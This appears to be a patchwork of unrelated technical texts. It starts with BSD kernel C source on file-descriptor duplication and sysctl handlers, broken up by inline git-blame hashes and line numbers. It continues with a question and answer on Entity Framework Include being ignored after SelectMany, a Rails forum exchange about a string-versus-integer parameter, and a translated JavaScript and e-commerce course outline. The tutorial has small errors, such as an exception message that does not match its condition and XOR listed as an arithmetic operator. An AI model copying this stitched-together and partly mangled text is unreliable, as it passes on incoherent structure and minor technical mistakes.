 * consists of only the ``open()'' routine, because all subsequent
 * references to this file will be direct to the other driver.
 */
/* ARGSUSED */
static int
fdopen(dev_t dev, int mode, int type, struct thread *td)
{
	KKASSERT(td->td_proc != NULL);

	/*
	 * XXX Kludge: set curproc->p_dupfd to contain the value of the
	 * file descriptor being sought for duplication.  The error
	 * return ensures that the vnode for this device will be released
	 * by vn_open.  Open will detect this special error and take the
	 * actions in dupfdopen below.  Other callers of vn_open or VOP_OPEN
	 * will simply report the error.
	 */
	td->td_proc->p_dupfd = minor(dev);
	return (ENODEV);
}

1718/*
1719 * Duplicate the specified descriptor to a free descriptor.
1720 */
1721int
41c20dac 1722dupfdopen(struct filedesc *fdp, int indx, int dfd, int mode, int error)
984263bc 1723{
41c20dac 1724 struct file *wfp;
984263bc
MD
1725 struct file *fp;
1726
1727 /*
1728 * If the to-be-dup'd fd number is greater than the allowed number
1729 * of file descriptors, or the fd to be dup'd has already been
1730 * closed, then reject.
1731 */
1732 if ((u_int)dfd >= fdp->fd_nfiles ||
0679adc4 1733 (wfp = fdp->fd_files[dfd].fp) == NULL) {
984263bc
MD
1734 return (EBADF);
1735 }
1736
1737 /*
1738 * There are two cases of interest here.
1739 *
1740 * For ENODEV simply dup (dfd) to file descriptor
1741 * (indx) and return.
1742 *
1743 * For ENXIO steal away the file structure from (dfd) and
1744 * store it in (indx). (dfd) is effectively closed by
1745 * this operation.
1746 *
1747 * Any other error code is just returned.
1748 */
1749 switch (error) {
1750 case ENODEV:
1751 /*
1752 * Check that the mode the file is being opened for is a
1753 * subset of the mode of the existing descriptor.
1754 */
1755 if (((mode & (FREAD|FWRITE)) | wfp->f_flag) != wfp->f_flag)
1756 return (EACCES);
0679adc4 1757 fp = fdp->fd_files[indx].fp;
984263bc 1758#if 0
0679adc4 1759 if (fp && fdp->fd_files[indx].fileflags & UF_MAPPED)
984263bc
MD
1760 (void) munmapfd(p, indx);
1761#endif
0679adc4
MD
1762 fdp->fd_files[indx].fp = wfp;
1763 fdp->fd_files[indx].fileflags = fdp->fd_files[dfd].fileflags;
984263bc
MD
1764 fhold(wfp);
1765 if (indx > fdp->fd_lastfile)
1766 fdp->fd_lastfile = indx;
1767 /*
1768 * we now own the reference to fp that the ofiles[] array
1769 * used to own. Release it.
1770 */
1771 if (fp)
dadab5e9 1772 fdrop(fp, curthread);
984263bc
MD
1773 return (0);
1774
1775 case ENXIO:
1776 /*
1777 * Steal away the file pointer from dfd, and stuff it into indx.
1778 */
0679adc4 1779 fp = fdp->fd_files[indx].fp;
984263bc 1780#if 0
0679adc4 1781 if (fp && fdp->fd_files[indx].fileflags & UF_MAPPED)
984263bc
MD
1782 (void) munmapfd(p, indx);
1783#endif
0679adc4
MD
1784 fdp->fd_files[indx].fp = fdp->fd_files[dfd].fp;
1785 fdp->fd_files[indx].fileflags = fdp->fd_files[dfd].fileflags;
69908319 1786 funsetfd(fdp, dfd);
984263bc
MD
1787
1788 /*
0679adc4 1789 * we now own the reference to fp that the files[] array
984263bc
MD
1790 * used to own. Release it.
1791 */
1792 if (fp)
dadab5e9 1793 fdrop(fp, curthread);
984263bc
MD
1794 /*
1795 * Complete the clean up of the filedesc structure by
1796 * recomputing the various hints.
1797 */
1798 if (indx > fdp->fd_lastfile) {
1799 fdp->fd_lastfile = indx;
1800 } else {
1801 while (fdp->fd_lastfile > 0 &&
0679adc4 1802 fdp->fd_files[fdp->fd_lastfile].fp == NULL) {
984263bc
MD
1803 fdp->fd_lastfile--;
1804 }
984263bc
MD
1805 }
1806 return (0);
1807
1808 default:
1809 return (error);
1810 }
1811 /* NOTREACHED */
1812}
1813
1814
1815struct filedesc_to_leader *
1816filedesc_to_leader_alloc(struct filedesc_to_leader *old,
1817 struct proc *leader)
1818{
1819 struct filedesc_to_leader *fdtol;
1820
7bf8660a
MD
1821 fdtol = malloc(sizeof(struct filedesc_to_leader),
1822 M_FILEDESC_TO_LEADER, M_WAITOK);
984263bc
MD
1823 fdtol->fdl_refcount = 1;
1824 fdtol->fdl_holdcount = 0;
1825 fdtol->fdl_wakeup = 0;
1826 fdtol->fdl_leader = leader;
1827 if (old != NULL) {
1828 fdtol->fdl_next = old->fdl_next;
1829 fdtol->fdl_prev = old;
1830 old->fdl_next = fdtol;
1831 fdtol->fdl_next->fdl_prev = fdtol;
1832 } else {
1833 fdtol->fdl_next = fdtol;
1834 fdtol->fdl_prev = fdtol;
1835 }
1836 return fdtol;
1837}
1838
1839/*
1840 * Get file structures.
1841 */
1842static int
1843sysctl_kern_file(SYSCTL_HANDLER_ARGS)
1844{
7b124c9f
JS
1845 struct kinfo_file kf;
1846 struct filedesc *fdp;
984263bc 1847 struct file *fp;
7b124c9f 1848 struct proc *p;
6d132b4d
MD
1849 int count;
1850 int error;
1851 int n;
984263bc
MD
1852
1853 /*
7b124c9f
JS
1854 * Note: because the number of file descriptors is calculated
1855 * in different ways for sizing vs returning the data,
1856 * there is information leakage from the first loop. However,
1857 * it is of a similar order of magnitude to the leakage from
1858 * global system statistics such as kern.openfiles.
6d132b4d
MD
1859 *
1860 * When just doing a count, note that we cannot just count
1861 * the elements and add f_count via the filehead list because
1862 * threaded processes share their descriptor table and f_count might
1863 * still be '1' in that case.
984263bc 1864 */
6d132b4d 1865 count = 0;
7b124c9f 1866 error = 0;
7b124c9f
JS
1867 LIST_FOREACH(p, &allproc, p_list) {
1868 if (p->p_stat == SIDL)
1869 continue;
6d132b4d 1870 if (!PRISON_CHECK(req->td->td_proc->p_ucred, p->p_ucred) != 0)
7b124c9f 1871 continue;
6d132b4d 1872 if ((fdp = p->p_fd) == NULL)
7b124c9f 1873 continue;
7b124c9f 1874 for (n = 0; n < fdp->fd_nfiles; ++n) {
0679adc4 1875 if ((fp = fdp->fd_files[n].fp) == NULL)
7b124c9f 1876 continue;
6d132b4d
MD
1877 if (req->oldptr == NULL) {
1878 ++count;
1879 } else {
1880 kcore_make_file(&kf, fp, p->p_pid,
1881 p->p_ucred->cr_uid, n);
1882 error = SYSCTL_OUT(req, &kf, sizeof(kf));
1883 if (error)
1884 break;
1885 }
7b124c9f 1886 }
984263bc 1887 if (error)
7b124c9f 1888 break;
984263bc 1889 }
6d132b4d
MD
1890
1891 /*
1892 * When just calculating the size, overestimate a bit to try to
1893 * prevent system activity from causing the buffer-fill call
1894 * to fail later on.
1895 */
1896 if (req->oldptr == NULL) {
1897 count = (count + 16) + (count / 10);
1898 error = SYSCTL_OUT(req, NULL, count * sizeof(kf));
1899 }
7b124c9f 1900 return (error);
984263bc
MD
1901}
1902
1903SYSCTL_PROC(_kern, KERN_FILE, file, CTLTYPE_OPAQUE|CTLFLAG_RD,
1904 0, 0, sysctl_kern_file, "S,file", "Entire file table");
1905
1906SYSCTL_INT(_kern, KERN_MAXFILESPERPROC, maxfilesperproc, CTLFLAG_RW,
1907 &maxfilesperproc, 0, "Maximum files allowed open per process");
1908
1909SYSCTL_INT(_kern, KERN_MAXFILES, maxfiles, CTLFLAG_RW,
1910 &maxfiles, 0, "Maximum number of files");
1911
60ee93b9
MD
1912SYSCTL_INT(_kern, OID_AUTO, maxfilesrootres, CTLFLAG_RW,
1913 &maxfilesrootres, 0, "Descriptors reserved for root use");
1914
984263bc
MD
1915SYSCTL_INT(_kern, OID_AUTO, openfiles, CTLFLAG_RD,
1916 &nfiles, 0, "System-wide number of open files");
1917
1918static void
1919fildesc_drvinit(void *unused)
1920{
1921 int fd;
1922
e4c9c0c8
MD
1923 cdevsw_add(&fildesc_cdevsw, 0, 0);
1924 for (fd = 0; fd < NUMFDESC; fd++) {
984263bc
MD
1925 make_dev(&fildesc_cdevsw, fd,
1926 UID_BIN, GID_BIN, 0666, "fd/%d", fd);
e4c9c0c8 1927 }
984263bc
MD
1928 make_dev(&fildesc_cdevsw, 0, UID_ROOT, GID_WHEEL, 0666, "stdin");
1929 make_dev(&fildesc_cdevsw, 1, UID_ROOT, GID_WHEEL, 0666, "stdout");
1930 make_dev(&fildesc_cdevsw, 2, UID_ROOT, GID_WHEEL, 0666, "stderr");
1931}
1932
1933struct fileops badfileops = {
f53ede20 1934 NULL, /* port */
455fcd7e 1935 NULL, /* clone */
984263bc
MD
1936 badfo_readwrite,
1937 badfo_readwrite,
1938 badfo_ioctl,
1939 badfo_poll,
1940 badfo_kqfilter,
1941 badfo_stat,
1942 badfo_close
1943};
1944
1945static int
dadab5e9
MD
1946badfo_readwrite(
1947 struct file *fp,
1948 struct uio *uio,
1949 struct ucred *cred,
1950 int flags,
1951 struct thread *td
1952) {
984263bc
MD
1953 return (EBADF);
1954}
1955
1956static int
dadab5e9 1957badfo_ioctl(struct file *fp, u_long com, caddr_t data, struct thread *td)
984263bc 1958{
984263bc
MD
1959 return (EBADF);
1960}
1961
1962static int
dadab5e9 1963badfo_poll(struct file *fp, int events, struct ucred *cred, struct thread *td)
984263bc 1964{
984263bc
MD
1965 return (0);
1966}
1967
1968static int
dadab5e9 1969badfo_kqfilter(struct file *fp, struct knote *kn)
984263bc 1970{
984263bc
MD
1971 return (0);
1972}
1973
1974static int
dadab5e9 1975badfo_stat(struct file *fp, struct stat *sb, struct thread *td)
984263bc 1976{
984263bc
MD
1977 return (EBADF);
1978}
1979
1980static int
dadab5e9 1981badfo_close(struct file *fp, struct thread *td)
984263bc 1982{
984263bc
MD
1983 return (EBADF);
1984}
1985
1986SYSINIT(fildescdev,SI_SUB_DRIVERS,SI_ORDER_MIDDLE+CDEV_MAJOR,
1987 fildesc_drvinit,NULL)
Entity Framework Include directive not getting all expected related rows
.net c# entity-framework entity-framework-6
Question
Entity Framework was loading a lot of data through lazy loading, which I noticed while troubleshooting some performance problems (900 extra query calls aren't quick!), even though I was certain I had the right Include. The real use case is more complicated, so I don't have much room to rework the signature of what I'm doing, but I've managed to condense it down to a fairly small test case that illustrates the confusion I'm seeing.
There are many MetaInfo rows relating to Documents. I want all MetaInfo rows to be included, so I won't have to issue a separate request for each Document's MetaInfo, but I also want the documents grouped by the MetaInfo rows with a specified value.
So I have the following query:
ctx.Configuration.LazyLoadingEnabled = false;
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo) // Load all the metaInfo for each object
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // Actualize the collection
I expected this to produce all of the Document/Author pairings, with each Document's MetaInfo property fully populated.
However, that's not what happens: each Document's MetaInfo collection contains ONLY the MetaInfo objects with Name == "Author". I still receive the Document objects and the Authors just fine.
The same thing happens if I move the Where clause out of the SelectMany, unless I move it to after the materialization. While this may not seem like a significant concern, it is in the real application, since it means we are receiving much more data than we want to handle.
After experimenting with several approaches, the problem seems to occur when you combine a Select(... new ...) with the Where and the Include. Performing the Select or Where after materialization makes the data appear as I had expected.
I modified the query as follows to test the idea, since I thought there could be a problem with the MetaInfo property of Document being filtered. I was surprised to see that this produces the same (and, in my opinion, incorrect) outcome.
ctx.Configuration.LazyLoadingEnabled = false;
var DocsByCreator = ctx.Meta
.Where(m => m.Name == "Author")
.Include(m => m.Document.MetaInfo) // Load all the metaInfo for Document
.Select(m => new { Doc = m.Document, Creator = m })
.ToList(); // Actualize the collection
I expected that because we're not putting the Where on the Document.MetaInfo property, this would get around the issue, but oddly enough, the documents still only contain an "Author" MetaInfo object.
In the simple test project I put together and posted to GitHub, the only test cases that pass are the ones that materialize the collection early.
https://github.com/Robert-Laverick/EFIncludeIssue
Does anyone have a theory? Am I misusing EF or SQL in some way? Is there another way to obtain the same results? Or is this an EF problem that has simply gone unnoticed because lazy loading is enabled by default and this is a somewhat unusual grouping operation?
10/10/2018 5:59:33 PM
Accepted Answer
A limitation of EF is that Includes are not honored if the shape of the entities returned changes from what the query started with.
For EF6 I couldn't find a reference to this, although EF Core documents the behavior (https://docs.microsoft.com/en-us/ef/core/querying/related-data — see "Ignored includes"). It may be a restriction put in place to keep EF's SQL generation from going completely off the rails in some circumstances.
While var docs = context.Documents.Include(d => d.Metas) would return the documents with their Metas eagerly loaded, the moment you .SelectMany(), the Include statement is ignored, since you are altering the shape of the data EF is meant to return.
If you want to return all of the documents together with a property identifying their author:
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo)
.ToList() // Materialize the documents and their Metas.
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // grab your collection of Doc and Author.
If you're just interested in documents with authors:
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo)
    .Where(d => d.MetaInfo.Any(m => m.Name == "Author"))
.ToList() // Materialize the documents and their Metas.
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // grab your collection of Doc and Author.
As a result, you must make sure that all of your filtering logic is applied above that .ToList() call. As an alternative, you might resolve the Author meta after the query, say, when view models are populated, or use an unmapped "Author" property on Document. I normally steer clear of unmapped properties, though, because if their use sneaks into an EF query you get a nasty runtime error.
Edit: Given the need to skip and take, I advise returning view models rather than entities. With a view model you tell EF to deliver just the raw data you want. View models can be populated either with straightforward filler code or with Automapper, which works well with EF and IQueryable and can handle most deferred scenarios like this one.
For instance:
public class DocumentViewModel
{
public int DocumentId { get; set; }
public string Name { get; set; }
public ICollection<MetaViewModel> Metas { get; set; } = new List<MetaViewModel>();
[NotMapped]
    public string Author // This could be updated to be a Meta, or a specialized view model.
{
get { return Metas.SingleOrDefault(x => x.Name == "Author")?.Value; }
}
}
public class MetaViewModel
{
public int MetaId { get; set; }
public string Name { get; set; }
public string Value { get; set; }
}
Then the query:
var viewModels = context.Documents
.Select(x => new DocumentViewModel
{
DocumentId = x.DocumentId,
Name = x.Name,
Metas = x.Metas.Select(m => new MetaViewModel
{
MetaId = m.MetaId,
Name = m.Name,
Value = m.Value
}).ToList()
}).Skip(pageNumber*pageSize)
.Take(PageSize)
.ToList();
At the data level, the connection between an "Author" and a document is assumed rather than enforced. With this approach the entity models stay "pure" to the data representation, and the code takes responsibility for turning the inferred connection into the author of a document.
Automapper can manage the .Select() population via .ProjectTo<TViewModel>().
Returning view models rather than entities helps you avoid problems like these: invalidated Include() operations, the temptation to detach and reattach entities between contexts, lazy-load serialization surprises if you forget to disable lazy loading, and unexpected #null data. It also improves performance and resource usage by selecting and sending only the data you actually need.
10/11/2018 9:39:08 PM
Licensed under: CC-BY-SA with attribution
Not affiliated with Stack Overflow
Codes work in console, irb, but not on website
Jason wrote:
I have the following code in my controller:
if request.post?
rid = params[:route_id]
salesorders = SalesOrder.find(:all)
@sales_orders = []
for so in salesorders
if not so.latest_history.nil?
if so.latest_history.route_id == rid
@sales_orders << so
end
end
end
end
If I use script/console, using the integer 2 instead of the
params[:route_id], it returns 19 results into @sales_orders. When I run
it on my site, I get 0 results. What's the difference? I ran
debug(params) and it's showing params[:route_id] is begin set to 2.
Any ideas?
Thanks!
Probably a data type mismatch. E.g. one is a string and the other is an integer/fixnum.
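A minimal sketch of that fix (the hash below stands in for what Rails hands the controller; names are taken from the question): request params arrive as strings, so the string "2" never equals the integer 2, and converting before comparing restores the match.

```ruby
# Request params are always strings, so "2" == 2 is false in Ruby.
params = { route_id: "2" }       # stand-in for the real request params
rid = params[:route_id].to_i     # normalize to an integer before comparing

puts("2" == 2)    # false -- the silent mismatch
puts(rid == 2)    # true  -- after the conversion
```

In the original code, changing `rid = params[:route_id]` to `rid = params[:route_id].to_i` (or comparing against `rid.to_i`) should make the website behave like the console.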
E-Commerce Website Development and Construction
Overview
64 class hours, 3.5 credits
Course outline
1. Overview of e-commerce websites
2. HTML5 + CSS3
3. JavaScript
4. Node
Overview of E-Commerce Websites
Definition of an e-commerce website
An e-commerce website is a site that an enterprise, institution, or company establishes on the Internet in order to promote its corporate image, publish product information, publicize economic regulations, provide commercial services, and so on.
Functions of an e-commerce website
• Corporate image promotion
• Publishing news and supply/demand information
• Showcasing products and services
• Ordering goods and services
Architecture of an e-commerce website
Components of an e-commerce website
• Domain name
• Physical location of the site
• Web pages
• Product catalog
• Shopping cart
• Checkout
JavaScript
• Core syntax
• Client-side JavaScript
Core syntax
• Lexical structure
• Types, variables, operators, and expressions
• Statements
• Arrays
• Functions
• Objects
• Classes and modules
• Pattern matching with regular expressions
Lexical structure
JavaScript is a case-sensitive language.
JavaScript supports two comment formats:
//this is a single-line comment
/*this is a block comment (it may span multiple lines)*/
In JavaScript, identifiers are used to name variables and functions. An identifier must begin with a letter, an underscore (_), or a dollar sign ($). Subsequent characters may be letters, digits, underscores, or dollar signs.
JavaScript reserved words cannot be used as identifiers, for example: break delete function return typeof case do if switch var catch
JavaScript separates statements with semicolons (;).
Types, variables, operators, and expressions
JavaScript data types fall into two categories:
• Primitive types: numbers, strings, and booleans. JavaScript also has two special primitive values: null (empty) and undefined.
• Object types: collections of properties, where each property is a name/value pair.
Numbers and arithmetic operators
Numbers: integers and floating-point numbers.
Arithmetic operators: addition (+), subtraction (-), multiplication (*), division (/), remainder (%), increment (++), decrement (--), bitwise XOR (^).
• Note: the return value of ++ and -- depends on their position relative to the operand. When the operator precedes the operand ("pre-increment"), it increments the operand and returns the incremented value. When it follows the operand ("post-increment"), it increments the operand but returns the value from before the increment.
var i=1,j=++i; //i and j are both 2
var i=1,j=i++; //i is 2, j is 1
• When ^ does not appear inside a regular expression, it is the bitwise XOR operator, operating on the binary representations of its operands.
• XOR outputs 0 when two bits are the same and 1 when they differ.
a^b     a in binary                      b in binary   result (binary)   result (decimal)
6^8     0110 (padded with a leading 0)   1000          1110              14
20^31   10100                            11111         01011             11
Mathematical constants
Constant       Description
Math.E         The constant e, the base of the natural logarithm
Math.LN10      The natural logarithm of 10
Math.LN2       The natural logarithm of 2
Math.LOG10E    The base-10 logarithm of e
Math.LOG2E     The base-2 logarithm of e
Math.PI        The constant π
Math.SQRT1_2   The reciprocal of the square root of 2
Math.SQRT2     The square root of 2
Mathematical functions
Function          Description
Math.abs(x)       Returns the absolute value of x
Math.acos(x)      Returns the arccosine of x
Math.asin(x)      Returns the arcsine of x
Math.atan(x)      Returns the arctangent of x
Math.atan2(y,x)   Returns the angle from the X axis to the point whose Y coordinate is y and X coordinate is x
Math.ceil(x)      Returns the closest integer greater than or equal to x
Math.cos(x)       Returns the cosine of x
Math.exp(x)       Returns e raised to the power x
Math.floor(x)     Returns the closest integer less than or equal to x
Math.log(x)       Returns the natural logarithm of x
Math.max(args…)   Returns the largest of its arguments; multiple values may be passed
Math.min(args…)   Returns the smallest of its arguments; multiple values may be passed
Math.pow(x,y)     Returns x raised to the power y
Math.random()     Returns a random number in [0.0, 1)
Math.round(x)     Returns the integer closest to x
Math.sin(x)       Returns the sine of x
Math.sqrt(x)      Returns the square root of x
Math.tan(x)       Returns the tangent of x
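A few of the rounding and comparison functions from the table, for example:

```javascript
console.log(Math.floor(3.7));    // 3  -- round down
console.log(Math.ceil(3.2));     // 4  -- round up
console.log(Math.round(3.5));    // 4  -- round to nearest
console.log(Math.max(1, 9, 4));  // 9
console.log(Math.min(1, 9, 4));  // 1
console.log(Math.pow(2, 10));    // 1024
```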
Number-related methods
Method                  Description
n.toExponential(digits) Returns a string representing n in exponential notation, with one digit before the decimal point and digits digits after it
n.toFixed(digits)       Returns a string representing n without exponential notation, with digits digits after the decimal point
n.toLocaleString()      Converts n to a string in the local format
n.toPrecision(prec)     Returns a string with prec significant digits. If prec is large enough to include the whole integer part of n, the result matches toFixed; otherwise exponential notation is used, with one digit before the decimal point and prec-1 digits after it
n.toString()            Converts n to a string
Number(object)          Converts the object's value to a number. If the argument is a Date object, Number() returns the number of milliseconds since January 1, 1970. If the object's value cannot be converted to a number, Number() returns NaN
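For example:

```javascript
var n = 123456.789;
console.log(n.toFixed(2));        // "123456.79"
console.log(n.toExponential(1));  // "1.2e+5"
console.log(n.toPrecision(4));    // "1.235e+5" -- 4 significant digits
console.log(n.toString());        // "123456.789"
console.log(Number("3.14"));      // 3.14
console.log(Number("abc"));       // NaN
```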
Strings
A string is a sequence of characters enclosed in single or double quotes. A string delimited by single quotes may contain double quotes, and a string delimited by double quotes may contain single quotes.
• Note: when delimiting strings with single quotes, watch out for English contractions (can't). The apostrophe and the single quote are the same character, so it must be escaped with a backslash (\), e.g. 'can\'t'.
String concatenation is one of JavaScript's built-in features; the concatenation operator is "+". For example:
var msg="hello, "+"world"; //produces the string "hello, world"
The length property gives the length of a string, e.g.: msg.length
When comparing strings with the ">" or "<" operator, JavaScript compares only the Unicode code points of the characters, without regard to locale ordering.
String comparison proceeds character by character and stops, returning the result, as soon as two characters differ. For example: "aBc"<"ab";
The localeCompare method can be used to sort Chinese characters by pinyin.
Character set              Range        Unicode (hex)   Unicode (decimal)
Digits                     0~9          30~39           48~57
Uppercase letters          A~Z          41~5A           65~90
Lowercase letters          a~z          61~7A           97~122
Basic Chinese characters   ~            4E00~9FA5       19968~40869
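Comparison by code point explains results that look wrong alphabetically:

```javascript
// "B" is code point 66 while "b" is 98, so the comparison is decided
// at the second character.
console.log("aBc" < "ab");        // true  -- 66 < 98
console.log("apple" < "banana");  // true  -- "a" (97) < "b" (98)
console.log("abc".charCodeAt(0)); // 97 -- see the table above
```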
String-related methods
Method                       Description
s.charAt(n)                  Returns the nth character of s, counting from 0
s.concat(value,…)            Returns a new string formed by appending each argument to s, e.g. s="hello"; s.concat("","world","!");
s.indexOf(s1 [,start])       Returns the position of the first occurrence of s1 at or after position start in s, or -1 if not found
s.lastIndexOf(s1[,start])    Returns the position of the last occurrence of s1 before position start in s, searching from the end of s toward the beginning, or -1 if not found
s.trim()                     Removes leading and trailing whitespace
s.match(s1)                  Searches the string for the specified value; returns s1 if found, null otherwise
s.replace(s1,s2)             Replaces s1 with s2 in s
s.search(s1)                 Returns the starting position of the first substring matching s1, or -1 if no match is found
s.slice(start,end)           Returns the characters from position start up to, but not including, position end
s.split(delimiter)           Splits s into an array on delimiter
s.substr(start,length)       Returns length characters starting at position start
s.substring(start,end)       Returns the characters from position start up to, but not including, position end
s.toLocaleLowerCase()        Converts s to lowercase in a locale-aware way
s.toLocaleUpperCase()        Converts s to uppercase in a locale-aware way
s.toLowerCase()              Converts s to lowercase
s.toUpperCase()              Converts s to uppercase
s.localeCompare(s1[,locale]) Returns a number less than 0 if s sorts before s1, greater than 0 if s sorts after s1, and 0 if they are equal. This can be used to sort Chinese characters by pinyin, e.g. "张三">"李四". Note: in Chrome you need s.localeCompare(s1,"zh"). locale is an array of locale strings containing one or more language or region tags; if it contains several, list them in descending priority so the preferred locale comes first. If this parameter is omitted, the JavaScript runtime's default locale is used.
Booleans, logical operators, relational operators, null and undefined
Booleans: this type has only two values, the reserved words true and false.
Logical operators: && (logical AND), || (logical OR), ! (logical NOT)
Relational operators: == (equal), < (less than), > (greater than), <= (less than or equal), >= (greater than or equal), != (not equal)
null is a JavaScript keyword denoting a special value, commonly used to describe "no value".
undefined is the value of a variable that has not been initialized. A function with no return value returns undefined.
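The two "empty" values compare equal with ==, but can be told apart with typeof:

```javascript
var x;                           // declared but never assigned
console.log(x == undefined);     // true
console.log(null == undefined);  // true -- == treats them as equal
console.log(typeof undefined);   // "undefined"
console.log(typeof null);        // "object"
```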
Variables
In JavaScript, a variable should be declared before use. Variables are declared with the keyword var, for example:
var i,j; //declare multiple variables with a single var
var i=0,j=0; //declaration and initial assignment can be combined
Variable scope:
• Global variables: declared outside any function
• Local variables: declared inside a function. All variables declared within a function are visible throughout the function body, which means a variable is visible even before its declaration. This JavaScript feature is informally known as hoisting, for example:
var scope="global";
function f() {
    console.log(scope); //prints "undefined", not "global"
    var scope="local"; //the variable is assigned its initial value here, but it is defined everywhere in the function body
    console.log(scope); //prints "local"
}
Assignment
Assignment expressions: JavaScript uses the "=" operator to assign a value to a variable or property.
Compound assignment operators:
Operator   Example   Equivalent to
+=         a+=b      a=a+b
-=         a-=b      a=a-b
*=         a*=b      a=a*b
/=         a/=b      a=a/b
%=         a%=b      a=a%b
^=         a^=b      a=a^b
Statements
Conditional statements
Conditional statements execute or skip certain statements depending on the value of a specified expression. JavaScript has two basic conditional statements:
• The if statement, which takes two forms:
// form 1
if (condition)
    statement1;
[else
    statement2;]
// form 2
if (condition){
    statement block 1;
}
[else{
    statement block 2;
}]
chap3-1.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>chap3-1</title>
</head>
<body>
<form>
    <span>The Grade:</span><input type="text" id="Grade">
</form>
<script>
    document.getElementById("Grade").onkeydown=function (e) {
        if(e.keyCode==13){
            if(e.target.value>=60)
                alert("Pass");
            else
                alert("Fail");
        }
    }
</script>
</body>
</html>
• The switch statement, whose form is:
switch (expression){
    case e1: //if expression==e1, execute statement block 1
        statement block 1;
        break; //stop executing the switch statement
    case e2: //if expression==e2, execute statement block 2
        statement block 2;
        break;
    case en: //if expression==en, execute statement block n
        statement block n;
        break;
    default: //if none of the cases match, execute statement block n+1
        statement block n+1;
        break;
}
chap3-2.html
<body><form><span>The Grade:</span><input type="text" id="Grade"></form>
<script>document.getElementById("Grade").onkeydown=function (e) {
    if(e.keyCode==13){
        var Grank=Math.floor(document.getElementById("Grade").value/10);
        switch (Grank){
            case 10:
                alert("Excellent");
                break;
            case 9:
                alert("Excellent");
                break;
            case 8:
                alert("Good");
                break;
            case 7:
                alert("Average");
                break;
            case 6:
                alert("Pass");
                break;
            default:
                alert("Fail");
                break;
        }}} </script></body>
Loop statements
Loops let part of the code execute repeatedly. JavaScript has four loop statements:
• The while statement
// form 1
while (condition)
    statement;
// form 2
while (condition){
    statement block;
}
chap3-3.html
<body>
<form>
    <span>Factorial:</span><input type="text" id="jc">
</form>
<script>
    var o=document.getElementById("jc");
    o.onkeydown=function (e) {
        if(e.keyCode==13){
            var m=n=o.value;
            var result=1;
            while(n>0){
                result*=n;
                n=n-1;
            }
            alert(m+"!="+result);
        }
    }
</script>
</body>
</html>
• The do/while statement
// form 1
do
    statement;
while(condition);
// form 2
do{
    statement block;
}while(condition);
chap3-4.html
<body>
<form>
    <span>Factorial:</span><input type="text" id="jc">
</form>
<script>
    var o=document.getElementById("jc");
    o.onkeydown=function (e) {
        if(e.keyCode==13){
            var m=n=o.value;
            var result=1;
            do{
                result*=n;
                n--;
            }while(n>0);
            alert(m+"!="+result);
        }
    }
</script>
</body>
• The for statement
for(initialize;test;increment){
    statements;
}
chap3-5.html
<body>
<form>
    <span>Factorial:</span><input type="text" id="jc">
</form>
<script>
    var o=document.getElementById("jc");
    o.onkeydown=function (e) {
        if(e.keyCode==13){
            var m=o.value;
            var result=1;
            for(var i=1;i<=m;i++){
                result*=i;
            }
            alert(m+"!="+result);
        }
    }
</script>
</body>
• The for/in statement
for(variable in object){
    statements;
}
chap3-6.html
<script>
    var a="1,2,3,4,5";
    var arr=a.split(",");
    var sum=0;
    for(var i in arr){
        sum+=Number(arr[i]);
    }
    alert("The sum of the values in "+a+" is: "+sum);
</script>
Jump statements
Jump statements make JavaScript execution jump from one location to another.
• The break statement jumps to the end of a loop or other statement.
• The continue statement ends the current iteration of a loop and begins the next one.
chap3-7.html
<script>
    var sumb=sumc=0;
    for(var i=1;i<=100;i++){
        sumb+=i;
        if(i==50)
            break;
    }
    for(var i=1;i<=100;i++){
        if(i==50)
            continue;
        sumc+=i;
    }
    alert("Result with break: "+sumb+"\n"+"Result with continue: "+sumc);
</script>
Labeled statements
A label consists of an identifier and a colon placed before a statement: identifier:statement
By labeling a statement, you can refer to it by name from anywhere in the program. break and continue are the only JavaScript statements that can use statement labels.
break|continue identifier;
mainloop: while(j<=100){
    j++;
    continue mainloop; //jump to the next iteration
}
alert("The value of j is: "+j);
mainloop: while(j<=100){
    j++;
    break mainloop;
}
alert("The value of j is: "+j); //the break statement jumps here
Note: whether or not continue carries a label, it can only be used inside a loop body.
The return statement
Specifies the return value of a function call: return expression;
function squre(x) {
    return x*x;
}
document.writeln("The square of 2 is: "+squre(2)+"<br>");
Exception-handling statements
An exception is a signal produced when some abnormal condition or error occurs. Throwing an exception means signaling that an error or abnormal condition has occurred; catching an exception means handling that signal, i.e., taking the steps needed to recover from it.
The throw statement throws an exception: throw expression;
The try/catch/finally statement catches exceptions:
try{
    //normally, the code here runs from start to finish without problems, but it may sometimes throw an exception, either directly with a throw statement or indirectly by calling a method that throws one
}
catch(e){
    //the code here executes if, and only if, the try block throws an exception. The local variable e refers to the Error object or other thrown value. This block may handle the exception in some way, ignore it, or rethrow it with throw.
}
finally{
    /*this code always runs, whether or not the try block threw an exception. The try block can terminate in these ways:
    1) normally, after executing its last statement
    2) via a break, continue, or return statement
    3) by throwing an exception that is caught by the catch clause
    4) by throwing an exception that is not caught and continues to propagate
    */
}
chap3-8.html
<script>
    function jc(x) {
        if(x<0||x>10) throw new Error("x must not be negative");
        for(var res=1;x>1;res*=x,x--);
        return res;
    }
    var grade=Number(prompt("Please enter a positive integer:",""));
    try{
        alert(grade+"!="+jc(grade));
    }
    catch (e){
        alert(e);
        var grade=Number(prompt("Please enter a positive integer:",""));
        if(grade>10) throw new Error("x must not exceed 10");
        alert(grade+"!="+jc(grade));
    }
    finally {
        alert("x must be between 1 and 10");
    }
</script>
Arrays
An array is an ordered collection of values. Each value is called an element, and each element has a position in the array, represented by a number called its index.
JavaScript arrays are untyped: array elements may be of any type, and different elements of the same array may have different types.
Creation
There are two ways to create an array:
• Array literals:
var empty=[]; //an array with no elements
var primes=[1,2,3,4,5]; //an array of five numbers
var misc=[1.1,true,"a"]; //three elements of different types
var base=1024;
var table=[base,base+1,base+2]; //values may be expressions
var b=[{x:1,y:2},primes]; //values may also be objects or other arrays
If a value is omitted from an array literal, the omitted element is given the value undefined:
